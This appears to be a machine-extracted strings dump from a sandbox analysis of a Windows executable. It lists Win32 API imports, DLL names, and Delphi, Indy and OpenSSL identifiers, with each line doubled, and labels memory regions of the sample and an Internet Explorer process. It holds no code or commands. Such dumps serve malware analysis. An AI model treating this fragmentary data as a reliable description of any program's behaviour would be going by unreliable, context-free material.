ableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
%original file name%.exe_196_rwx_005C5000_00001000:
KERNEL32.DLL
KERNEL32.DLL
advapi32.dll
advapi32.dll
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
kernel32.dll
kernel32.dll
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
version.dll
version.dll
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
winspool.drv
winspool.drv
netapi32.dll
netapi32.dll
RegUnLoadKeyW
RegUnLoadKeyW
ShellExecuteW
ShellExecuteW
iexplore.exe_1292:
%?9-*09,*19}*09
%?9-*09,*19}*09
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
SHLWAPI.dll
SHLWAPI.dll
SHDOCVW.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
IE-X-X
rsabase.dll
rsabase.dll
System\CurrentControlSet\Control\Windows
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
dw15 -x -s %u
watson.microsoft.com
watson.microsoft.com
IEWatsonURL
IEWatsonURL
%s -h %u
%s -h %u
iedw.exe
iedw.exe
Iexplore.XPExceptionFilter
Iexplore.XPExceptionFilter
jscript.DLL
jscript.DLL
mshtml.dll
mshtml.dll
mlang.dll
mlang.dll
urlmon.dll
urlmon.dll
wininet.dll
wininet.dll
shdocvw.DLL
shdocvw.DLL
browseui.DLL
browseui.DLL
comctl32.DLL
comctl32.DLL
IEXPLORE.EXE
IEXPLORE.EXE
iexplore.pdb
iexplore.pdb
ADVAPI32.dll
ADVAPI32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
IExplorer.EXE
IExplorer.EXE
IIIIIB(II<.fg>
IIIIIB(II<.fg>
7?_____ZZSSH%
7?_____ZZSSH%
)z.UUUUUUUU
)z.UUUUUUUU
,....Qym
,....Qym
````2```
````2```
{.QLQIIIKGKGKGKGKGKG
{.QLQIIIKGKGKGKGKGKG
;33;33;0
;33;33;0
8888880
8888880
8887080
8887080
browseui.dll
browseui.dll
shdocvw.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5512 (xpsp.080413-2105)
Windows
Windows
Operating System
Operating System
6.00.2900.5512
6.00.2900.5512
copy%original file name%.exe_896:
biClrImportant
biClrImportant
tagMSG
tagMSG
Windows
Windows
HKEY
HKEY
TWMKey
TWMKey
KeyData
KeyData
grfLocksSupported
grfLocksSupported
ENotSupportedException
ENotSupportedException
ENoMonitorSupportException
ENoMonitorSupportException
.uvCOu
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
etNoMonitorSupportException
etNoMonitorSupportException
Operator
Operator
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
EInvalidOperation|
EInvalidOperation|
TList.TDirection
TList.TDirection
AOperator
AOperator
TThread.TSynchronizeRecord
TThread.TSynchronizeRecord
TOperation
TOperation
Operation
Operation
FOnExecute
FOnExecute
OnExecute8
OnExecute8
TList.Sort$ActRec
TList.Sort$ActRec
TComponent.FindComponent$ActRec
TComponent.FindComponent$ActRec
TComponent.FindComponent$ActRecl&D
TComponent.FindComponent$ActRecl&D
HelpKeyword
HelpKeyword
UnderstandsKeyword
UnderstandsKeyword
DeleteKey
DeleteKey
TRegKeyInfo
TRegKeyInfo
NumSubKeys
NumSubKeys
MaxSubKeyLen
MaxSubKeyLen
FCurrentKey
FCurrentKey
FRootKey
FRootKey
FCloseRootKey
FCloseRootKey
CloseKey
CloseKey
CreateKey
CreateKey
GetKeyInfo
GetKeyInfo
GetKeyNames
GetKeyNames
HasSubKeys
HasSubKeys
KeyExists
KeyExists
LoadKey
LoadKey
MoveKey
MoveKey
OpenKey
OpenKey
OpenKeyReadOnly
OpenKeyReadOnly
ReplaceKey
ReplaceKey
RestoreKey
RestoreKey
SaveKey
SaveKey
UnLoadKey
UnLoadKey
CurrentKey@
CurrentKey@
LastErrorMsgh
LastErrorMsgh
RootKey@
RootKey@
RootKeyName
RootKeyName
EInvalidGraphicOperation
EInvalidGraphicOperation
SupportsPartialTransparency
SupportsPartialTransparency
SupportsClipboardFormat
SupportsClipboardFormat
Monochrome42E
Monochrome42E
TCustomButton.TButtonStyle
TCustomButton.TButtonStyle
OnKeyDown|^H
OnKeyDown|^H
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
poPortrait
poPortrait
APort
APort
Port
Port
FProportional
FProportional
Proportional
Proportional
FAutoHotkeys
FAutoHotkeys
RethinkHotkeys
RethinkHotkeys
AutoHotkeys,
AutoHotkeys,
IsShortCut
IsShortCut
AutoHotkeysx
AutoHotkeysx
igoParentPassthrough
igoParentPassthrough
FAlwaysShowDragImages
FAlwaysShowDragImages
AlwaysShowDragImages
AlwaysShowDragImages
toFlickFallbackKeys
toFlickFallbackKeys
'TCustomGestureEngine.TGestureEngineFlag
'TCustomGestureEngine.TGestureEngineFlag
(TCustomGestureEngine.TGestureEngineFlags
(TCustomGestureEngine.TGestureEngineFlags
Supported
Supported
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
FHelpKeyword
FHelpKeyword
FOnKeyDown
FOnKeyDown
FOnKeyPress
FOnKeyPress
FOnKeyUp
FOnKeyUp
IsHintMsg
IsHintMsg
FNativeWheelSupport
FNativeWheelSupport
FWheelSupportMessage
FWheelSupportMessage
thHeaderItemLeftPressed
thHeaderItemLeftPressed
tsArrowBtnLeftPressed
tsArrowBtnLeftPressed
ttbThumbLeftPressed
ttbThumbLeftPressed
lrMonoChrome
lrMonoChrome
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
fsShowing
fsShowing
FWindowState
FWindowState
FKeyPreview
FKeyPreview
WantChildKey
WantChildKey
KeyPreviewt
KeyPreviewt
WindowStatex
WindowStatex
KeyPreview
KeyPreview
WindowState
WindowState
FBiDiKeyboard
FBiDiKeyboard
FNonBiDiKeyboard
FNonBiDiKeyboard
FEnumAllWindowsOnActivateHint
FEnumAllWindowsOnActivateHint
FOnActionExecute
FOnActionExecute
Keyword
Keyword
EnumAllWindowsOnActivateHint@
EnumAllWindowsOnActivateHint@
BiDiKeyboard@
BiDiKeyboard@
NonBiDiKeyboard
NonBiDiKeyboard
OnActionExecute
OnActionExecute
TFileOperation
TFileOperation
FileOperation
FileOperation
FCompletionPort
FCompletionPort
LicenseKey
LicenseKey
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserFileDownload
TWebBrowserNavigateError
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
%TWebBrowserPrivacyImpactedStateChange
FOnWindowSetResizable
FOnWindowSetResizable
FOnWindowSetLeft
FOnWindowSetLeft
FOnWindowSetTop
FOnWindowSetTop
FOnWindowSetWidth
FOnWindowSetWidth
FOnWindowSetHeight
FOnWindowSetHeight
TWebBrowser&
TWebBrowser&
cmdID
cmdID
cmdexecopt
cmdexecopt
TWebBrowser|
TWebBrowser|
OnWindowSetResizable
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetLeft
OnWindowSetTop
OnWindowSetTop
OnWindowSetWidth
OnWindowSetWidth
OnWindowSetHeightp
OnWindowSetHeightp
LocationURL
LocationURL
AMsg
AMsg
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange
EIdInvalidPortRange
CheckIPVersionSupport
CheckIPVersionSupport
VPort
VPort
WSGetServByPort
WSGetServByPort
APortNumber
APortNumber
IdStackWindows
IdStackWindows
TIdSocketListWindows4
TIdSocketListWindows4
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsg
TIdStackWindowsg
ReceiveMsg
ReceiveMsg
WSTranslateSocketErrorMsg
WSTranslateSocketErrorMsg
SupportsIPv6
SupportsIPv6
TIdStackWindows
TIdStackWindows
EIdIPVersionUnsupportedhHN
EIdIPVersionUnsupportedhHN
EIdIPVersionUnsupported@HN
EIdIPVersionUnsupported@HN
FSourcePort
FSourcePort
FDestPort
FDestPort
SourcePort
SourcePort
DestPort
DestPort
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
FClientPortMin
FClientPortMin
FClientPortMax
FClientPortMax
FPort
FPort
FPeerPort
FPeerPort
ClientPortMin
ClientPortMin
ClientPortMax@
ClientPortMax@
PeerPortSVW
PeerPortSVW
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
VMsgEnd
VMsgEnd
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
FPassword
FPassword
OpenUDP
OpenUDP
CloseUDP
CloseUDP
RecvFromUDP
RecvFromUDP
VPeerPort
VPeerPort
SendToUDP
SendToUDP
Password
Password
FBoundPort
FBoundPort
FBoundPortMax
FBoundPortMax
FBoundPortMin
FBoundPortMin
TIdTCPClientCustom'
TIdTCPClientCustom'
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
BoundPort
BoundPort
BoundPortMax
BoundPortMax
BoundPortMin
BoundPortMin
TIdTCPClient
TIdTCPClient
Uh.UO
Uh.UO
IPAsString
IPAsString
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
FUDPSocksAssociation
FUDPSocksAssociation
FDefaultPort
FDefaultPort
DefaultPort
DefaultPort
BoundPortMin8
BoundPortMin8
FLastCmdResult
FLastCmdResult
TIdTCPConnectionB
TIdTCPConnectionB
RaiseExceptionForLastCmdResult
RaiseExceptionForLastCmdResult
SendCmd
SendCmd
SendCmdf
SendCmdf
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
LastCmdResult
LastCmdResult
URLDecode
URLDecode
URLEncode
URLEncode
Password@
Password@
Port@
Port@
AURL
AURL
FHttpOnly
FHttpOnly
HttpOnly@
HttpOnly@
FCommentURL
FCommentURL
FPortList
FPortList
FRecvPort
FRecvPort
FUsePort
FUsePort
CommentURL
CommentURL
PortCount
PortCount
UsePort
UsePort
RecvPort
RecvPort
CompressFTPDeflate
CompressFTPDeflate
CompressFTPToIO
CompressFTPToIO
DecompressFTPFromIO
DecompressFTPFromIO
DecompressFTPDeflate
DecompressFTPDeflate
CompressHTTPDeflate
CompressHTTPDeflate
DecompressHTTPDeflate
DecompressHTTPDeflate
TerminatingExceptionClassh
TerminatingExceptionClassh
fPassThrough
fPassThrough
PassThrough
PassThrough
MakeFTPSvrPort
MakeFTPSvrPort
MakeFTPSvrPasv
MakeFTPSvrPasv
FURL
FURL
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort@
ProxyPort@
dsa_keygen
dsa_keygen
pub_key
pub_key
priv_key
priv_key
PEVP_PKEYT,R
PEVP_PKEYT,R
EVP_PKEY_union
EVP_PKEY_union
EVP_PKEY
EVP_PKEY
pkey
pkey
pkey_type
pkey_type
required_pkey_type
required_pkey_type
key_len
key_len
key_length
key_length
AUTHORITY_KEYID
AUTHORITY_KEYID
keyid
keyid
PAUTHORITY_KEYID
PAUTHORITY_KEYID
X509_PUBKEY
X509_PUBKEY
public_key
public_key
PX509_PUBKEY
PX509_PUBKEY
X509_CERT_AUX
X509_CERT_AUX
PX509_CERT_AUX
PX509_CERT_AUX
cert_info
cert_info
ex_nscert
ex_nscert
get_cert_methods
get_cert_methods
cert_crl
cert_crl
ppem_password_cb
ppem_password_cb
key_arg_length
key_arg_length
key_arg
key_arg
master_key_length
master_key_length
master_key
master_key
sess_cert
sess_cert
Ptlsext_ticket_key_cb!
Ptlsext_ticket_key_cb!
cert_store
cert_store
default_passwd_callback
default_passwd_callback
default_passwd_callback_userdata
default_passwd_callback_userdata
client_cert_cb
client_cert_cb
extra_certs
extra_certs
max_cert_list
max_cert_list
cert
cert
msg_callback
msg_callback
msg_callback_arg
msg_callback_arg
client_cert_engine
client_cert_engine
tlsext_tick_key_name
tlsext_tick_key_name
tlsext_tick_hmac_key
tlsext_tick_hmac_key
tlsext_tick_aes_key
tlsext_tick_aes_key
tlsext_ticket_key_cb
tlsext_ticket_key_cb
init_msg
init_msg
read_key
read_key
write_key
write_key
key_material_length
key_material_length
key_material
key_material
tmp_cert_type
tmp_cert_type
tmp_cert_length
tmp_cert_length
tmp_cert_verify_md
tmp_cert_verify_md
tmp_cert_req
tmp_cert_req
tmp_key_block_length
tmp_key_block_length
tmp_key_block
tmp_key_block
tmp_cert_request
tmp_cert_request
msg_len
msg_len
w_msg_hdr
w_msg_hdr
r_msg_hdr
r_msg_hdr
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
fsRootCertFile
fsRootCertFile
fsCertFile
fsCertFile
fsKeyFile
fsKeyFile
RootCertFile@
RootCertFile@
CertFile@
CertFile@
KeyFile
KeyFile
LoadRootCert
LoadRootCert
LoadCert
LoadCert
RootCertFiled
RootCertFiled
CertFiled
CertFiled
fPeerCert
fPeerCert
PeerCert`
PeerCert`
fOnGetPassword
fOnGetPassword
OnGetPassword
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertErrorp
EIdOSSLLoadingRootCertErrorp
EIdOSSLLoadingCertErrorX
EIdOSSLLoadingCertErrorX
EIdOSSLLoadingCertError0
EIdOSSLLoadingCertError0
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
TIdHTTPConnectionType
TIdHTTPConnectionType
IdHTTP
IdHTTP
